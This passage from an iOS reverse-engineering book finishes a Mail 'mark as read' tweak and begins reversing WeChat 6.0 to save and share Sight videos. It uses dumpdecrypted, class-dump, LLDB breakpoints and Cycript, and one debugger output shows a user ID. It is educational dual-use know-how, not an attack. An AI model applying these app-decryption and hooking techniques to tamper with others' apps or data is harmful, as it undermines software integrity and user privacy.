  for (NSString *sender in [message senders]) if (!messageInfo.read && [sender 
rangeOfString:[NSString stringWithFormat:@"<%@>", whitelist]].location == NSNotFound) 
[targetMessages addObject:message];  
  [messageInfo release];  
 } 
 [messages release];  
 [mall markMessagesAsViewed:targetMessages];  
} 
%end 
8.4.4  Edit Makefile and control files  
The finalized Makefile looks like this:  
export THEOS_DEVICE_IP = iOSIP  
export ARCHS = armv7 arm64  
export TARGET = iphone:clang:latest:8.0  
 
include theos/makefiles/common.mk  
 
299  
TWEAK_NAME = iOSREMailMarker  
iOSREMailMarker_FILES = Tweak.xm  
iOSREMailMarker_FRAMEWORKS = UIKit  
 
include $(THEOS_MAKE_PATH)/tweak.mk  
 
after-install::  
 install.exec "killall -9 MobileMail"  
The finalized control looks like this:  
Package: com.iosre.mailmarker  
Name: iOSREMailMarker  
Depends: mobilesubstrate, firmware (>= 8.0)  
Version: 1.0  
Architecture: iphoneos -arm 
Description: Mark non -whitelist emails as r ead! 
Maintainer: sam  
Author: sam  
Section: Tweaks  
Homepage: http://bbs.iosre.com  
8.4.5  Test 
Compile the tweak and install it on iOS. Open Mail but it seems nothing changed. That is 
because we haven ’t configured iOSREMailMarker yet. As shown in figure 8 -18, there are 44 
unread messages currently. 
  
Figure 8-  17 44 unread emails  
After entering the “ Mailboxes ” view, there is a new whitelist button on the left side of 
navigation bar. Press it and a new whitelist dialog will pop up, as shown in 8 -19. 

 
300   
Figure 8-  18 Whitelist dialog  
I’ve subscribed a copy of NYTimes and will spen d about 15 minutes reading it every day. 
Let’s add NYTimes into whitelist, as shown in figure 8 -20. 
  
Figure 8-  19 Add NYTimes into whitelist  
At last, send an email to myself to trigger megaMallMessageCountChanged:. After receiving 
the email, all emails except NYTimes are marked as read, as shown in 8 -21. 

 
301   
Figure 8- 21 iOSREMailMarker marked all emails except NYTimes as read  
So far, we have achieved all of our goals successfully.  
8.5   Conclusion 
In this chapter, we’ ve taken Mail as an example and added a feature that can automatically 
mark emails outside whitelist as read, which helps us highlight the important emails. The filter 
condition of iOSREMailMarker is somewhat simple, and it may not be a good solution for 
everyone to simply ma rk emails as read. So I hope you can learn this chapter by analogy and 
intimidate the ideas to make your own unique tweaks. Of course, you are welcome to share your works on our website. 
So far, we have gone through 2 practices. I hope everyone enjoyed the m and had the feeling 
that our brains should keep one step ahead of our hands in iOS reverse engineering. Only when 
you get fully prepared during early stage analysis can you write an excellent tweak later. TiGa, a 
veteran reverse engineer, once said: “A reverser should know how/what is done before 
grabbing tools to complete the tasks automatically. ” I believe that everyone will gradually 
realize the meaning of this sentence during continuously studying reverse engineering.  
  

302  
Practice 3: Save and share Sight in WeChat  
 
  
9.1   WeChat  
WeChat is one of the most outstanding IM App in the mobile Internet industry. In China, it 
is the daily necessity of most netizens. WeChat ’s launch image is as shown in figure 9 -1; it seems 
that there is a little sorrow in its great power.  
 
Figure 9- 1 Launch image of WeChat  
In October 3rd, 2014, WeChat has updated to version 6.0 and added a new feature, Sight i.e. 
short videos. It was so fun that my WeChat friends started to share all kinds of Sights, as shown 
in figure 9- 2. 
9 
  
 
303  
Figure 9- 2 Sight 
 
Figure 9- 3 Menu of Sight  
Although we can already mark our interested Sights via long press menus (as shown in 
figure 9 -3), I’m not satisfied yet; it’ d be better if those Sights can be downloaded or shared on 
other platforms. So, the goal of this chapter is adding two options to long press menu of Sight, 
which are “ Save to Disk ” and “ Copy URL”  respectively.  

 
304 The size of WeChat 6.0 is bigger than 80 MB; it ’s rather complicated reversing it. As usual, 
before reversing, we need to analyze and modeling the target, then make a plan and carry it out. 
The following operations are done on WeChat 6.0 on iOS 8.1, iPhone 5. After the publication of 
this book, WeChat will probably update to a higher version, there will be some tiny changes in 
the following operations, but the general ideas stay the same. For the analysis of the latest 
WeChat, please keep following http://bbs.iosre.com . 
9.2   Tweak prototyping  
9.2.1  Observe Sight view and look for cut -in points  
First, switch Sights ’ autoplay in “WeChat ” → “Me” → “Settings ” → “General ” → “Sights in 
Moments ” to “Never ”, as shown in figure 9- 4. 
 
Figure 9- 4 Never autoplay Sights in Moments  
Let’s review figure 9 -3 and think together: “Favorite”  and “ Report Abuse ” will pop up after 
we long press the Sight view. Doesn ’t this phenomenon indicate that the Sight view can already 
respond to long press gestures? So, we only need to find the gesture action selector and hook it, 
then we can pop up our custom menu with options “Save to Disk ” and “ Copy URL”  just inside 
this func tion.  
There is a line of words “Tap to download ” under the play button in Sight view, which 

 
305 means WeChat will download the Sight to iOS first, and then play it offline. Therefore, we can 
conclude that a download URL already exists in a Sight, and the down loaded Sight is saved 
somewhere on iOS. Luckily, the URL and the downloaded Sight happen to be our goal of this 
chapter, if we can find their locations in WeChat, our job is done. After the previous 2 practices, 
I believe your understanding of MVC has beco me deeper: If we manage to get the V of a Sight, 
we can get its M, which contains the Sight ’s download URL and video objects.  
OK, now we know that WeChat has already invented the wheel, we just need to find and 
make use of it. In order to speed up our reve rsing process, we won ’t be overly sticking to the 
execution logic of WeChat with IDA or LLDB, but try our best to look for clues in class -dump 
headers, and then verify our guesses to reach the goal of locating the Sight. 
9.2.2  Get WeChat headers using cla ss-dump  
First decrypt WeChat with dumpdecrypted, which is explained in details in chapter 4. It is 
worth mentioning that the executable name of WeChat is not “WeiXin ” (which is Chinese 
pinyin) or “ WeChat ”, but “ MicroMessenger ”. After we get MicroMessenger.decrypted, drag and 
drop it to IDA before continuing. Then use class -dump to export its headers.  
snakeninnysiMac:~  snakeninny$  class-dump –S –s -H ~/MicroMessenger  -o ~/header6.0  
After executing the above command, 5225 headers are generated,  as shown in figure 9 -5. 
 
306  
Figure 9- 5 Headers of WeChat 6.0  
WeChat has the most headers among all Apps I have ever seen, going through all these files 
one by one is mission impossible for a single person. Such a big project is unlikely to be 
completed by one single team, perhaps Tencent just splits WeChat into several subprojects, for 
example, Moments subproject, IM subproject, drift bottle subproject, Sight subproject, etc. For each subproject, there ’s one team in charge. At last, all subprojects are merg ed into one big 
project, namely WeChat.  
9.2.3   Import WeChat headers into Xcode  
Import all WeChat headers to an empty Xcode project, as shown in figure 9 -6. 

 
307  
Figure 9- 6 WeChat headers in Xcode  
The built -in search and highlight functions in Xcode help disp lay the code beautifully and 
neatly. Now, let ’s cut into the code via WeChat ’s UI.  
9.2.4   Locate the Sight view using Reveal  
There is no need to introduce how to configure Reveal again. Launch WeChat and enter 
Moments to find a Sight, then use Reveal to see the view hierarchy, as shown in figure 9 -7. 
 

308 Figure 9- 7 Use Reveal to see the UI layout of WeChat  
In figure 9 -7, text “LLBean shirt with nice fabric ” can be discovered easily in both sides, 
indicating their correspondence. Keep checking around RichTex tView, the Sight view is very 
conspicuous, as shown in figure 9 -8. 
 
Figure 9- 8 Locate the Sight view  
The Sight view is an object of WCContentItemViewTemplateNewSight. Do you still 
remember the indent principle mentioned in the section of recursiveDescription?  According to 
the rule of “the view with more indentation is the subview of the view with less in dentation ”, 
WCContentItemViewTemplateNewSight’ s subviews include WCSightView, and 
WCSightView ’s subviews include UIImageView and SightPlayerView. Because “Sight”  is the 
nickname of short videos in WeChat, these classes with the name “sight ” should be given more 
attention. 
9.2.5   Find the long press action selector  
Commonly we use addGestureRecognizer: to add a long press gesture recognizer in iOS. 
Since long press a Sight view shows a menu, the long press gesture is very probably to be added  
right on the Sight view. Since this view is an object of 
WCContentItemViewTemplateNewSight, let ’s see what ’s in its header file:  
@interface  WCContentItemViewTemplateNewSight  : WCContentItemBaseView  
<WCActionSheetDelegate,  SessionSelectControllerDelegate,  WCSightViewDelegate>  
...... 
- (void)onMore:(id)arg1;  
- (void)onFavoriteAdd:(id)arg1;  
- (void)onLongTouch;  

 
309 - (void)onShowSightAction;  
- (void)onLongPressedWCSightFullScreenWindow:(id)arg1;  
- (void)onLongPressedWCSight:(id)arg1;  
- (void)onClickWCSight:(id)arg1;  
...... 
@end 
In the header, methods with keywords “LongTouch”  and “ LongPressed”  are very likely to 
be our targets. Now, IDA should have finished the initial analysis, let ’s take a look at the 
implementation of these methods. onLongTouch first, as shown in figure 9 -9. 
 
Figure 9- 9 onLongTouch  
The execution flow of this method is very simple. Look through the method body quickly, 
“UIMenuController ” can be easily found, as shown in figure 9 -10. 
 
Figure 9- 10 onLongTouch  
 “Favorite”  stands out too, as shown in figure 9 -11. 

 
310  
Figure 9- 11 onLongTouch  
Unless WeChat is intentionally confusing us with these keywords, 
[WCContentItemViewTemplateNewSight onLongTouch] must be the response method of 
long press gestures. No need to hurry, let ’s take a look at methods with keyword 
“LongPressed” , as shown in figure 9- 12. 
 
Figure 9- 12 onLongPressedWCSightFullScreenWindow:  
It seems that it records some information, then calls onShowSightAction. Double click 
onShowSightAction to see its implementation, as shown in figure 9 -13. 

 
311  
Figure 9- 13 onShowSightAction  
In figure 9 -13, we know that a WCActionSheet object is created from the very beginning. 
From its name, we can guess that WCActionSheet acts like UIActionSheet, but we didn ’t see 
any a ction sheet when we long press the Sight, so onLongPressedWCSightFullScreenWindow: 
is probably not the method we want.  
The last method, onLongPressedWCSight:, is shown in figure 9 -14. 
 
Figure 9- 14 onLongPressedWCSight:  
From figure 9 -14, we can see it reco rds some information, then calls onLongTouch, which 
proves our conjecture indirectly. Now, let ’s debug onLongPressedWCSightFullScreenWindow: 
and onLongTouch using LLDB. Firstly, attach debugserver to MicroMessenger:  

 
312 snakeninnysiMac:Documents  snakeninny$  ssh root@localhost  -p 2222 
FunMaker -5:~ root# debugserver  *:1234 -a MicroMessenger  
debugserver -@(#)PROGRAM:debugserver   PROJECT:debugserver -320.2.89  
 for armv7. 
Attaching  to process MicroMessenger...  
Listening  to port 1234 for a connection  from *... 
Waiting for debugger  instructions  for process 0. 
Then check the ASLR offset of WeChat: 
(lldb) image list -o -f 
[  0] 0x00000000  /private/var/mobile/Containers/Bundle/Application/E4EBD049 -1A75-4830-
BC65-0132C0EBC1CA/MicroMessenger.app/MicroMessenger(0x00000000000 04000) 
[  1] 0x022dc000  /Library/MobileSubstrate/MobileSubstrate.dylib(0x00000000022dc000)  
...... 
The ASLR offset of WeChat is surprisingly 0x0. Next, let ’s check the base addresses of 
onLongPressedWCSightFullScreenWindow: and onLongTouch, as shown in figure 9-15 and 9 -
16. 
 
Figure 9- 15 onLongPressedWCSightFullScreenWindow:  
 
Figure 9- 16 onLongTouch  
The base addresses of them are 0x21e484 and 0x21e7ec. Set 2 breakpoints on them then long 
press the Sight view to see whether these breakpoints are triggered:  
(lldb) br s -a 0x21e484  
Breakpoint  3: where = MicroMessenger`___lldb_unnamed_function9789$$MicroMessenger,  
address = 0x0021e484  
(lldb) br s -a 0x21e7ec  
Breakpoint  4: where = MicroMessenger`___lldb_unnamed_function9791$$MicroMessenger,  
address = 0x0021e7ec  
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x0021e7ec  
MicroMessenger`___lldb_unnamed_function9791$$MicroMessenger,  queue = 'com.apple.main -
thread, stop reason = breakpoint  4.1 

 
313     frame #0: 0x0021e7ec  MicroMessenger`___lldb_unnamed_function9791$$Mi croMessenger  
MicroMessenger`___lldb_unnamed_function9791$$MicroMessenger:  
-> 0x21e7ec:   push   {r4, r5, r6, r7, lr} 
   0x21e7ee:   add    r7, sp, #12 
   0x21e7f0:   push.w {r8, r10, r11} 
   0x21e7f4:   sub    sp, #32 
(lldb) p (char *)$r1 
(char *) $0 = 0x017fdc2b "onLongTouch"  
(lldb) c 
Process 184500 resuming  
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x0021e7ec  
MicroMessenger`___lldb_unnamed_function9791$$MicroMessenger,  queue = 'com.apple.main -
thread, stop reason = breakpoint  4.1 
    frame #0: 0x0021e7ec  MicroMessenger`___lldb_unnamed_function9791$$MicroMessenger  
MicroMessenger`___lldb_unnamed_function9791$$MicroMessenger:  
-> 0x21e7ec:   push   {r4, r5, r6, r7, lr} 
   0x21e7ee:   add    r7, sp, #12 
   0x21e7f0:   push.w {r8, r10, r11} 
   0x21e7f4:   sub    sp, #32 
(lldb) p (char *)$r1 
(char *) $1 = 0x017fdc2b  "onLongTouch"  
As we can see, onLongTouch was called twice, and 
onLongPressedWCSightFullScreenWindow was never called. Take another look at 
onLongPressedWCSight:, its base address is shown in figure 9- 17. 
 
Figure 9-  17 onLongPressedWCSight:  
Set a breakpoint on this method to see whether it ’s triggered: 
(lldb) c 
Process 184500 resuming  
(lldb) br del 
About to delete all breakpoints,  do you want to do that?: [Y/n] y 
All breakpoints  removed.  (2 breakpoints)  
(lldb) br s -a 0x21e414  
Breakpoint  5: where = MicroMessenger`___lldb_unnamed_function9788$$MicroMessenger,  
address = 0x0021e414  
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x0021e414  
MicroMessenger`___lldb_unnamed_function97 88$$MicroMessenger,  queue = 'com.apple.main -
thread, stop reason = breakpoint  5.1 
    frame #0: 0x0021e414  MicroMessenger`___lldb_unnamed_function9788$$MicroMessenger  
MicroMessenger`___lldb_unnamed_function9788$$MicroMessenger:  
-> 0x21e414:   push   {r4, r5, r6, r7, lr} 
   0x21e416:   add    r7, sp, #12 
   0x21e418:   sub    sp, #16 

 
314    0x21e41a:   mov    r4, r0 
(lldb) p (char *)$r1 
(char *) $2 = 0x0182c799  "onLongPressedWCSight:"  
(lldb) c 
Process 184500 resuming  
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x0021e414  
MicroMessenger`___lldb_unnamed_function9788$$MicroMessenger,  queue = 'com.apple.main -
thread, stop reason = breakpoint  5.1 
    frame #0: 0x0021e414  MicroMessenger`___lldb_unnamed_function9788$$MicroMessenger  
MicroMessenger`___lldb_unnamed_functi on9788$$MicroMessenger:  
-> 0x21e414:   push   {r4, r5, r6, r7, lr} 
   0x21e416:   add    r7, sp, #12 
   0x21e418:   sub    sp, #16 
   0x21e41a:   mov    r4, r0 
(lldb) p (char *)$r1 
(char *) $3 = 0x0182c799  "onLongPressedWCSight:"  
(lldb) po $r2 
<WCSightView:  0x2454dc0;  baseClass  = UIControl;  frame = (0 3; 200 150); 
gestureRecognizers  = <NSArray:  0x87e5110>;  layer = <CALayer:  0xd3be460>>  
onLongPressedWCSight: was also called twice, and its argument was an object of 
WCSightView. By now, we have located the response method of long press gestures, which is 
onLongPressedWCSight: or onLongTouch. Next, we need to go further to find the trace of the 
Sight. 
9.2.6   Find the controller of Sight view using Cycript  
First, click “ Tap to download ” in the Sight view to do wnload the video, as shown in figure 
9-18. 
 
315  
Figure 9- 18 Download the Sight  
Upon successful download, “Tap to download ” disappears. The procedures of getting C 
from V and tracking M from C are repeated so many times, so let ’s get our hands dirty for now:  
FunMaker -5:~ root# cycript -p MicroMessenger  
cy# ?expand 
expand == true 
cy# [[UIApp keyWindow]  recursiveDescription]  
@"<iConsoleWindow:  0x2392e50;  baseClass  = UIWindow;  frame = (0 0; 320 568); 
gestureRecognizers  = <NSArray:  0x2391b00>;  layer = <UIWindowLay er: 0x2391690>>  
   | <UILayoutContainerView:  0x7e71870;  frame = (0 0; 320 568); autoresize  = W+H; layer 
= <CALayer:  0x7e71830>>  
   |    | <UITransitionView:  0x7e720b0;  frame = (0 0; 320 568); clipsToBounds  = YES; 
autoresize  = W+H; layer = <CALayer:  0x7e722a0>> 
...... 
   |    |    |    |    |    |    |    |    |    |    |    |    | 
<WCContentItemViewTemplateNewSight:  0xd3be3e0;  frame = (61 64; 200 153); clipsToBounds  = 
YES; layer = <CALayer:  0x7e922d0>>  
   |    |    |    |    |    |    |    |    |    |    |    |    |    | <WCSightView:  
0x2454dc0;  baseClass  = UIControl;  frame = (0 3; 200 150); gestureRecognizers  = <NSArray:  
0x87e5110>;  layer = <CALayer:  0xd3be460>>  
   |    |    |    |    |    |    |    |    |    |    |    |    |    |    | <UIImageView:  
0xd34e8d0;  frame = (0 0; 200 150); opaque = NO; userInteractionEnabled  = NO; layer = 
<CALayer:  0xd34e950>>  
   |    |    |    |    |    |    |    |    |    |    |    |    |    |    | 
<SightPlayerView:  0x7e50ff0;  frame = (0 0; 200 150); layer = <CALayer:  0xd302770>>  
   |    |    |    |    |    |    |    |    |    |    |    |    |    |    | <UIView:  
0xd37d9e0;  frame = (0 0; 200 150); layer = <CALayer:  0xd37da50>>  
   |    |    |    |    |    |    |    |    |    |    |    |    |    |    |    | <UIView:  
0xd30d5f0;  frame = (0 0; 200 150); tag = 10050; layer = <CALayer:  0x87e5650>>  
   |    |    |    |    |    |    |    |    |    |    |    |    |    |    |    | 
<SightIconView:  0xd3be2e0;  frame = (0 0; 200 150); layer = <CALayer:  0xd3be380>>  

 
316    |    |    |    |    |    |    |    |    |    |    |    |    |    |    |    | 
<MMUILabel:  0x7ee7530;  baseClass  = UILabel;  frame = (0 103; 200 20); text = 'Tap to 
play'; hidden = YES; userInteractionEnabled  = NO; tag = 10040; layer = <_UILabelLayer:  
0x7e50dd0>>  
...... 
cy# [#0xd3be3e0  nextRespond er] 
#"<WCTimeLineCellView:  0x872c530;  frame = (0 0; 313 243); tag = 1048577;  layer = 
<CALayer:  0x872ce80>>"  
cy# [#0x872c530  nextResponder]  
#"<UITableViewCellContentView:  0x8729d80;  frame = (0 0; 320 251); gestureRecognizers  = 
<NSArray:  0x8729f80>;  layer = <CALayer:  0x8729df0>>"  
cy# [#0x8729d80  nextResponder]  
#"<MMTableViewCell:  0x8729be0;  baseClass  = UITableViewCell;  frame = (0 1164.33;  320 
251); autoresize  = W; layer = <CALayer:  0x8729b50>>"  
cy# [#0x8729be0  nextResponder]  
#"<UITableViewWrapperView:  0xab09890; frame = (0 0; 320 568); gestureRecognizers  = 
<NSArray:  0xab09b00>;  layer = <CALayer:  0x7e6e4b0>;  contentOffset:  {0, 0}; contentSize:  
{320, 568}>" 
cy# [#0xab09890  nextResponder]  
#"<MMTableView:  0x30c3200;  baseClass  = UITableView;  frame = (0 0; 320 568); 
gestureRecognizers  = <NSArray:  0xab09600>;  layer = <CALayer:  0xab09160>;  contentOffset:  
{0, 1090}; contentSize:  {320, 3186.3333}>"  
cy# [#0x30c3200  nextResponder]  
#"<UIView:  0x7e3b040;  frame = (0 0; 320 568); autoresize  = W+H; layer = <CALayer:  
0x7e3afd0>> " 
cy# [#0x7e3b040  nextResponder]  
#"<WCTimeLineViewController:  0x28bd200>"  
We’ve got WCTimeLineViewController as expected. Meanwhile, we can guess “Time 
Line ” is the code name of “Moments ”. 
9.2.7   Find the Sight object in WCTimeLineViewController  
Look through WCTimeLineViewController.h, there are only a few properties in it; also it 
has no obvious methods to access M. Yet there are 2 suspicious global variables, as follows:  
    WCDataItem  *_inputDataItem;  
    WCDataItem  *_cacheDateItem;  
But they are both NULL:  
cy# #0x28bd200 ->_cacheDateItem  
null 
cy# #0x28bd200 ->_inputDataItem  
null 
Seems like we’ ve lost. Is it time to give up? No! Let ’s keep calm and carry on: Because 
Moments are presented as table views, and there’ s a method named 
tableView:cellForRowAtIndexPath: in WCTimeLineViewController, which means this class 
implements UITableViewDataSource protocol, so it must have a close relationship with M. 
Now, jump to this method in IDA, as shown in figure 9 -19. 
 
317  
Figure 9- 19 [WCTimeLine ViewController tableView:cellForRowAtIndexPath:]  
Look through this method, you will find 3 red squares in figure 9 -17 are the core of this 
method, other parts are just setting the background, theme and color of the cell. Let ’s take a 
look at these 3 red squares closely, as shown in figure 9 -20. 
 
Figure 9- 20 A close look at the 3 red squares  
From left to right, the methods are genUploadFailCell:indexPath, 
genNormalCell:indexPath: and genRedHeartCell:indexPath:. Which cell is for Sight? I guess it ’s 
“NormalCell” , let’ s take a look at the implementation of genNormalCell:indexPath:, as shown in 
figure 9 -21. 

 
318  
Figure 9-  21 [WCTimeLineViewController genNormalCell:indexPath:]  
The logic is not complicated, if you look through the method body, a suspicious me thod 
comes up, as shown in figure 9 -22. 
 
Figure 9- 22 [WCTimeLineViewController genNormalCell:indexPath:]  
Infer from the name, getTimelineDataItemOfIndex: in figure 9 -22 is probably the data 

 
319 source of the current cell. Set a breakpoint at the bottom instru ction, i.e. “__text:002A091C 
BLX.W j__objc_msgSend ”, then think of a way to trigger it. We have already known that 
tableView:cellForRowAtIndexPath: is called when UITableView needs to display a new cell. In 
order to make this breakpoint break on a cell wit h Sight, we just need to scroll the Sight out of 
screen, then scroll it back. When the Sight is scrolled out, a new cell will scroll in, hence triggers the breakpoint; there ’s no Sight on this cell, this kind of breakpoint doesn ’t meet our 
requirement, so what we do is to disable the breakpoint first, then enable the breakpoint after 
the Sight is scrolled out of the screen completely. Now we can scroll the Sight back, the 
breakpoint will break on a cell with Sight:  
(lldb) br s -a 0x2A091C  
Breakpoint  6: where = MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
208, address = 0x002a091c  
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x002a091c  
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 208, queue = 
'com.apple.main -thread, stop reason = breakpoint  6.1 
    frame #0: 0x002a091c  MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
208 
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 208: 
-> 0x2a091c:   blx    0xe08e0c                   ; 
___lldb_unnamed_fun ction70162$$MicroMessenger  
   0x2a0920:   mov    r11, r0 
   0x2a0922:   movw   r0, #32442 
   0x2a0926:   movt   r0, #436 
(lldb) ni 
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x002a0920  
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 212, queue = 
'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x002a0920  MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
212 
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 212: 
-> 0x2a0920:   mov    r11, r0 
   0x2a0922:   movw   r0, #32442 
   0x2a0926:   movt   r0, #436 
   0x2a092a:   add    r0, pc 
(lldb) po $r0 
Class name: WCDataItem,  addr: 0x80f52b0  
tid: 11896185303680028954  
username:  wxid_hqouu9kgsgw3e6  
createtime:  1418135798  
commentUsers:  ( 
) 
contentObj:  <WCContentItem:  0x8724c20>  
We’ve got a WCDataItem object, with a WCContentItem object in it. Is the “Data ” in 
WCDataItem a Sight? Let ’s test it with LLDB by setting this WCDataItem object to NULL and 
see what happens. Repeat the previous operations to tri gger the breakpoint on a Sight cell:  
Process 184500 stopped 
 
320 * thread #1: tid = 0x2d0b4,  0x002a091c  
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 208, queue = 
'com.apple.main -thread, stop reason = breakpoint  6.1 
    frame #0: 0x002a091c  MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
208 
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 208: 
-> 0x2a091c:   blx    0xe08e0c                   ; 
___lldb_unnamed_function70162$$MicroMessenger  
   0x2a0920:   mov    r11, r0 
   0x2a0922:   movw   r0, #32442 
   0x2a0926:   movt   r0, #436 
(lldb) ni 
Process 184500 stopped 
* thread #1: tid = 0x2d0b4,  0x002a0920  
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 212, queue = 
'com.apple.main -thread, stop reason = instruction  step over 
    frame #0: 0x002a0920  MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 
212 
MicroMessenger`___lldb_unnamed_function11980$$MicroMessenger  + 212: 
-> 0x2a0920:   mov    r11, r0 
   0x2a0922:   movw   r0, #32442 
   0x2a0926:   movt   r0, #436 
   0x2a092a:   add    r0, pc 
(lldb) register  write r0 0 
(lldb) br del 
About to delete all breakpoints,  do you want to do that?: [Y/n] y 
All breakpoints  removed.  (1 breakpoint)  
(lldb) c 
 
Figure 9- 23 E ffect of setting the return value to NULL  
The first Sight totally disappeared, as shown in figure 9 -23. This phenomenon indicates that 
the data source of the Sight is indeed WCDataItem. Before analyzing WCDataItem, there 
remains one problem to be solved: How can we get a W CDataItem object from the hooked 

 
321 method [WCContentItemViewTemplateNewSight onLongTouch]?  
9.2.8  Get a WCDataItem object from 
WCContentItemViewTemplateNewSight  
Do you still remember how we ’ve got an object of WCDataItem in LLDB? The answer is 
getTimelineDataItemOfIndex:. Go back to figure 9 -22 to see the callers and arguments of this 
method.  
As we can see, the caller is the return value of getService:, the argument is the return value 
of calcDataItemIndex:, as shown in figure 9- 24. 
 
Figure 9- 24 Analyze getT imelineDataItemOfIndex:  
New problems emerge: How do we call getService: and calcDataItemIndex:? Let ’s start 
from getService:. From the instruction “ MOV R0, R6 ”, we know the caller is R6; R6 is the return 
value of [MMServiceCenter defaultCenter]. The argument is from the return value of 
[WCFacade class], as shown in figure 9- 25. 

 
322  
Figure 9- 25 Analyze getTimelineDataItemOfIndex:  
So the caller of getTimelineDataItemOfIndex: can be obtained by [[MMServiceCenter 
defaultCenter] getService:[WCFacade class]].  Next, let’ s continue with calcDataItemIndex:. 
From the instruction “MOV R0, R4 ”, we know the caller is R4 and R4 is “self” . The argument is 
from the return value of [indexPath section], as shown in figure 9 -26 and 9 -27. 

 
323  
Figure 9- 26 Analyze getTimelineDa taItemOfIndex:  
 

324 Figure 9- 27 Analyze getTimelineDataItemOfIndex  
Therefore, the argument of getTimelineDataItemOfIndex: can be obtained from 
[WCTimeLineViewController calcDataItemIndex:[indexPath section]]. Because we are inside 
[WCContentItemViewTemplateNewSight onLongTouch], we can get MMTableViewCell, 
MMTableView and WCTimeLineViewController in sequence via [self nextResponder], then get 
indexPath via [MMTableView indexPathForCell:MMTableViewCell], and the whole process has 
already been proved in section 9.2.6. Although it looks inconvenient, obtaining the 
WCDataItem object from WCContentItemViewTemplateNewSight conforms to standard 
MVC design pattern at least. It is worth mentioning that the prefixes of 
WCTimeLineViewController  and WCContentItemViewTemplateNewSight are WC, I guess it 
is short for WeChat; the prefixes of MMTableViewCell and MMTableView are MM, I guess it is 
short for MicroMessenger. The difference of prefixes may be exactly caused by different 
subprojects and tea ms. Next, we will focus on WCDataItem and try to get the download URL 
and local path of the Sight.  
9.2.9   Get target information from WCDataItem  
Open WCDataItem.h and take an overview:  
@interface  WCDataItem  : NSObject  <NSCoding>  
{ 
    int cid; 
    NSString  *tid; 
    int type; 
    int flag; 
    NSString  *username;  
    NSString  *nickname;  
    int createtime;  
    NSString  *sourceUrl;  
    NSString  *sourceUrl2;  
    WCLocationInfo  *locationInfo;  
    BOOL isPrivate;  
    NSMutableArray  *sharedGroupIDs;  
    NSMutabl eArray *blackUsers;  
    NSMutableArray  *visibleUsers;  
    unsigned  long extFlag;  
    BOOL likeFlag;  
    int likeCount;  
    NSMutableArray  *likeUsers;  
    int commentCount;  
    NSMutableArray  *commentUsers;  
    int withCount;  
    NSMutableArray  *withUsers;  
    WCContentItem  *contentObj;  
    WCAppInfo  *appInfo;  
    NSString  *publicUserName;  
 
325     NSString  *sourceUserName;  
    NSString  *sourceNickName;  
    NSString  *contentDesc;  
    NSString  *contentDescPattern;  
    int contentDescShowType;  
    int contentDescSc ene; 
    WCActionInfo  *actionInfo;  
    unsigned  int hash; 
    SnsObject  *snsObject;  
    BOOL isBidirectionalFan;  
    BOOL noChange;  
    BOOL isRichText;  
    NSMutableDictionary  *extData;  
    int uploadErrType;  
    NSString  *statisticsData;  
} 
 
+ (id)fromBuffer:(id)arg1;  
+ (id)fromServerObject:(id)arg1;  
+ (id)fromUploadTask:(id)arg1;  
@property(retain,  nonatomic)  WCActionInfo  *actionInfo;  // @synthesize  actionInfo;  
@property(retain,  nonatomic)  WCAppInfo  *appInfo;  // @synthesize  appInfo;  
@property(re tain, nonatomic)  NSArray *blackUsers;  // @synthesize  blackUsers;  
@property(nonatomic)  int cid; // @synthesize  cid; 
@property(nonatomic)  int commentCount;  // @synthesize  commentCount;  
@property(retain,  nonatomic)  NSMutableArray  *commentUsers;  // @synthesize  commentUsers;  
- (int)compareDesc:(id)arg1;  
- (int)compareTime:(id)arg1;  
@property(retain,  nonatomic)  NSString  *contentDesc;  // @synthesize  contentDesc;  
@property(retain,  nonatomic)  NSString  *contentDescPattern;  // @synthesize  
contentDescPattern;  
@property (nonatomic)  int contentDescScene;  // @synthesize  contentDescScene;  
@property(nonatomic)  int contentDescShowType;  // @synthesize  contentDescShowType;  
@property(retain,  nonatomic)  WCContentItem  *contentObj;  // @synthesize  contentObj;  
@property(nonatomic)  int createtime;  // @synthesize  createtime;  
- (void)dealloc;  
- (id)description;  
- (id)descriptionForKeyPaths;  
- (void)encodeWithCoder:(id)arg1;  
@property(retain,  nonatomic)  NSMutableDictionary  *extData;  // @synthesize  extData;  
@property(nonatomic)  unsigned  long extFlag;  // @synthesize  extFlag;  
@property(nonatomic)  int flag; // @synthesize  flag; 
- (id)getDisplayCity;  
- (id)getMediaWraps;  
- (BOOL)hasSharedGroup;  
- (unsigned  int)hash;  
- (id)init;  
- (id)initWithCoder:(id)arg1;  
@property(nonatomic)  BOOL isBidirectionalFan;  // @synthesize  isBidirectionalFan;  
- (BOOL)isEqual:(id)arg1;  
@property(nonatomic)  BOOL isPrivate;  // @synthesize  isPrivate;  
- (BOOL)isRead;  
@property(nonatomic)  BOOL isRichText;  // @synthesize  isRichText;  
- (BOOL)isUploadFailed;  
- (BOOL)isUploading;  
- (BOOL)isValid;  
- (id)itemID;  
- (int)itemType;  
- (id)keyPaths;  
@property(nonatomic)  int likeCount;  // @synthesize  likeCount;  
 
326 @property(nonatomic)  BOOL likeFlag;  // @synthesize  likeFlag;  
@property(retain,  nonatomic)  NSMutableArray  *likeUsers;  // @synthesize  likeUsers;  
- (void)loadPattern;  
@property(retain,  nonatomic)  WCLocationInfo  *locationInfo;  // @synthesize  locationInfo;  
- (void)mergeLikeUsers:(id)arg1;  
- (void)mergeMessage:(id)arg1;  
- (void)mergeMessage:(id)arg1  needParseContent:(BOOL)arg2;  
@property(retain,  nonatomic)  NSString  *nickname;  // @synthesize  nickname;  
